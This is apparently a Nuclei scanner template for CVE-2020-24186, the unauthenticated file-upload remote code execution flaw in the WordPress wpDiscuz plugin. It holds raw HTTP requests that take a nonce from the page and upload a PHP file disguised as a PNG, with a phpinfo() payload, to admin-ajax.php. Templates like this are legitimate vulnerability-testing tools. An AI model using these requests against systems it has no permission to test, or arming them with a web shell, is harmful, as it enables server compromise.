nuclei-templates/cves/2020/CVE-2020-24186.yaml

90 lines
2.8 KiB
YAML

id: CVE-2020-24186
info:
name: WordPress wpDiscuz <=7.0.4 - Remote Code Execution
author: Ganofins
severity: critical
description: WordPress wpDiscuz plugin versions version 7.0 through 7.0.4 are susceptible to remote code execution. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site's server.
reference:
- https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md
- https://nvd.nist.gov/vuln/detail/CVE-2020-24186
- https://www.wordfence.com/blog/2020/07/critical-arbitrary-file-upload-vulnerability-patched-in-wpdiscuz-plugin/
- http://packetstormsecurity.com/files/162983/WordPress-wpDiscuz-7.0.4-Shell-Upload.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2020-24186
cwe-id: CWE-434
tags: rce,upload,packetstorm,cve,cve2020,wordpress,wp-plugin
requests:
- raw:
- |
GET /?p=1 HTTP/1.1
Host: {{Hostname}}
Accept: */*
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary88AhjLimsDMHU1Ak
Origin: {{BaseURL}}
Referer: {{BaseURL}}
------WebKitFormBoundary88AhjLimsDMHU1Ak
Content-Disposition: form-data; name="action"
wmuUploadFiles
------WebKitFormBoundary88AhjLimsDMHU1Ak
Content-Disposition: form-data; name="wmu_nonce"
{{wmuSecurity}}
------WebKitFormBoundary88AhjLimsDMHU1Ak
Content-Disposition: form-data; name="wmuAttachmentsData"
undefined
------WebKitFormBoundary88AhjLimsDMHU1Ak
Content-Disposition: form-data; name="wmu_files[0]"; filename="rce.php"
Content-Type: image/png
{{base64_decode('/9j/4WpFeGlmTU0q/f39af39Pv39/f39/f39/f2o/f39/cD9/f39/f39/f39/f/g/UpGSUb9/f39/9tD/f0M/QwK/f0=')}}
<?php phpinfo();?>
------WebKitFormBoundary88AhjLimsDMHU1Ak
Content-Disposition: form-data; name="postId"
1
------WebKitFormBoundary88AhjLimsDMHU1Ak--
extractors:
- type: regex
part: body
internal: true
name: wmuSecurity
group: 1
regex:
- 'wmuSecurity":"([a-z0-9]+)'
- type: regex
part: body
group: 1
regex:
- '"url":"([a-z:\\/0-9-.]+)"'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'success":true'
- 'fullname'
- 'shortname'
- 'url'
condition: and
part: body
# Enhanced by mp on 2022/04/19